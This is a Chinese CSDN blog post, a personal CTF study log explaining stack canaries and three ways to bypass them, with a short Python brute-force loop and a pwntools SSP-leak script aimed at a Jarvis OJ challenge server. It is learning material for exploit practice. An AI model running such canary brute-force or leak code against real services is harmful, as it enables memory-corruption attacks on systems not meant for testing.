日志 7.10 pwn

最新推荐文章于 2023-10-26 17:43:45 发布
最新推荐文章于 2023-10-26 17:43:45 发布
阅读量197 收藏
点赞数
分类专栏: 资料 日志 文章标签: 日志 二进制 网络安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RobinZZX/article/details/95330754
版权

canary

在函数执行语句之前,在栈上插入一个值,这个值不能得到或预测,在函数语句执行完之后,会查看栈中的值是否被修改/覆盖来判断是否被溢出,若值被修改则调用___stack_chk_fail()来结束程序。

利用方法:

1. 泄露canary

使用条件:格式化字符串漏洞+找到canary在栈中的偏移
利用格式化字符串漏洞等泄露出canary

2. 爆破canary

使用条件:有fork()机制
在有fork()机制的文件上,fork()的作用相当于自我复制,每一次复制出来的程序,内存布局都是一样的,当然canary值也一样。那我们就可以逐位爆破,如果程序GG了就说明这一位不对,如果程序正常就可以接着跑下一位,直到跑出正确的canary。
注意:canary的最低位是\x00,32位canary的值是4字节,64位为8字节。
爆破:以32为例

canary = '\x00'
for j in range(3):
    for i in range(0x100):
        cn.send('a'*100 + canary + chr(i))
        a = cn.recvuntil('welcome\n')
        if 'recv' in a:
            canary += chr(i)
            break
3. 故意触发canary (Stack Smashing Protector)

当canary的值与原来不一致时,会调用___stack_chk_fail()函数,这个函数会将栈上的arg[0]参数打印出来,我们可以通过覆盖该参数来使程序打印出想要的内容

from pwn import *
context.log_level = 'debug'

cn = remote('pwn.jarvisoj.com', 9877)
#cn = process('pwn_smashes')
cn.recv()
cn.sendline(p64(0x0400d20)*200)
cn.recv()
cn.sendline()
cn.recv()
今日疑问:为什么这个需要再发送一次cn.sendline()呢?

TIPS:

ELF的重映射:当可执行文件足够小的时候,他的不同区段可能会被多次映射。

在这里插入图片描述

RobinZZX
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MS-DOS7.10完整安装光盘
04-23
MS-DOS 7.10 是微软公司推出的个人计算机操作系统的一个早期版本,它在1990年代末期被广泛使用。这个系统是基于DOS的,提供了对当时硬件的全面支持,尤其对于那些需要简单、高效运行的老式应用程序和游戏来说,MS-...
MSDOS7.10.iso
05-05
MSDOS7.10 制作DOS启动盘用,内含华硕更新BIOS工具
ELF 文件中的section 和 segment
wo_der的博客
06-02 7522
ELF 是可执行目标文件的一种格式,上计算机系统的时候曾经简略的接触到,这个可执行文件中包含了 代码段,数据段等信息,供程序运行的时候进行调用,但是实在太久没有看到这个东西了,今天又看到了ELF文件的时候,对elf 节和 elf 段的概念很陌生 ELF segment 和 section 用上图来解释很恰当,其实就是对于elf文件中一部分相同内容的不同描述映射而已,就是上图红框中
jarvis OJ部分writeup
aoque9909的博客
02-23 176
[XMAN]level 0 [XMAN]level 1 —— 简单shellcode利用 [XMAN]level 2 [XMAN]level 3 —— ret2libc尝试 [XMAN]level2&level3 x64 [XMAN]level 4 —— DynELF [XMAN]level 5 smashes ——SSP leak & ELF重映射 Te...
ELF文件-段和程序头
王文清的博客
01-05 3930
可执行文件和共享目标文件(动态链接库)是程序在磁盘中的静态存储形式;要执行一个程序,系统就要先把相应的可执行文件和共享目标文件装载到进程的地址空间中,这样就形成一个可运行进程的内存空间布局,称为进程镜像;一个已经装载完成的进程空间中会包含多个不同的段(Segment),比如,代码段、数据段、堆栈段,等等; 准备一个程序的内存镜像,大体上可以分为两个步骤:装载和链接;前者是把目标文件装载到内存中,
学习日志 7.10
xiannvbang的博客
07-10 108
  学习日志                                       姓名:石圆圆        日期:7.10     今日学习任务 学习嵌入式Linux开发工具的使用 今日任务完成情况 今日任务按计划完成 1.     熟练使用文本编辑器vim;(基...
filebeat7.10上传日志到ES7.14
fen_fen的专栏
10-26 261
filebeat7.10上传日志到ES7.14
ELK 收集 Tomcat 日志
王清欢的博客
03-14 5223
01 Tomcat 安装与测试 1.1 安装 Tomcat 安装Tomcat的本体和相关官方测试demo,参考链接 apt-get install tomcat8 -y # 安装Tomcat本体 apt-get install tomcat8-docs tomcat8-examples tomcat8-admin -y # 安装测试demo 1.2 Tomcat 启动检查 systemctl start tomcat8 # 启动Tomcat systemctl status tomcat8 netstat
ES7.10 集群部署
a1808862593的博客
09-07 246
1. node1创建证书、秘钥,直接回车先不设置密码。 2. 将证书、秘钥上传至node2、node3。 3. node1-3修改集群配置,添加认证配置并重启服务。
kibana/7.10 安装
sunlidejava的博客
10-17 242
kibana/7.10 安装 官方安装页面 https://www.elastic.co/guide/en/kibana/7.10/targz.html 安装命令 curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.10.2-linux-x86_64.tar.gz curl https://artifacts.elastic.co/downloads/kibana/kibana-7.10.2-linux-x86_64.t
IAR For ARM 7.10 破解
04-19
iar7.10 破解 同时支持低版本的破解
jwplayer-7.10.4.rar
02-28
JW Player是一款广泛使用的开源视频播放器,版本7.10.4是其在发展过程中一个重要的里程碑。这款播放器以其强大的功能、易用性和高度的定制性深受开发者喜爱。以下将详细介绍JW Player 7.10.4的相关知识点。 1. **...
乐鑫ESP32移植LVGL 7.10
朝气蓬勃
04-15 3362
零. 声明 本专栏文章我们会以连载的方式持续更新,本专栏计划更新内容如下: 第一篇:ESP-IDF基本介绍,主要会涉及模组,芯片,开发板的介绍,环境搭建,程序编译下载,启动流程等一些基本的操作,让你对ESP-IDF开发有一个总体的认识,比我们后续学习打下基础! 第二篇:ESP32-IDF外设驱动介绍,主要会根据esp-idf现有的driver,提供各个外设的驱动,比如LED,OLED,SPI LCD,TOUCH,红外,Codec ic等等,在这一篇中,我们不仅仅来做外设驱动,还会对常用的外设总.
浏览器打开任意可执行exe文件方法
RobinZZX的博客
06-02 3954
思路:通过注册表注册自定义URL协议执行bat脚本,将文件路径作为参数传入环境:win10问题1:可以从浏览器直接打开可执行文件吗?答:不能。其实可以通过 实现软件直接打开,但是它是不安全的,并且现在被大多数现代浏览器禁止,只能在 ie 使用。而通过注册表自定义URL协议,通过将文件名、操作等作为参数加入URL并由浏览器访问,可以触发协议执行bat脚本执行相应操作。问题2:如何获取文件的路径?可以从浏览器上通过 直接获取吗?答:问题1我们知道无法在浏览器直接可执行exe文件。从外部打开的话,就需要有文件
关于 .init .fini .init_array .fini_array 日志 7.16 pwn
RobinZZX的博客
07-16 3119
查找资料的高效性 retn 返回到栈顶地址 关于 .init .fini .init_array .fini_array 其中存放着的是在main函数执行前执行的代码,由__libc_start_main调用,(__libc_start_main在libc.so上,所以先有start()调用__libc_start_main,再调用init段的代码)在这段代码中就有我们经常使用的libc_csu的...
强化学习部分基础算法总结(Q-learning DQN PG AC DDPG TD3)
RobinZZX的博客
11-14 2094
总结回顾一下近期学习的RL算法,并给部分实现算法整理了流程图、贴了代码。 1. value-based 基于价值的算法 基于价值算法是通过对agent所属的environment的状态或者状态动作对进行评分。对于已经训练好的模型,agent只需要根据价值函数对当前状态选择评分最高的动作即可;对于正在训练的模型,我们通常将目标值(真实行动带来的反馈)和价值函数的预测值的差距作为loss训练价值函数。 通常使用两种价值函数: 状态价值函数 V(s),策略为 π 的状态-值函数,即状态s下预计累计回报的期望值
codesoft7.10安装
最新发布
01-10
codesoft 7.10是一款专业的条码标签设计软件,安装过程相对比较简单。首先,需要确保你的计算机符合软件的最低配置要求,然后通过官方渠道下载codesoft 7.10的安装程序。安装程序一般是一个.exe文件,双击打开后会弹...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值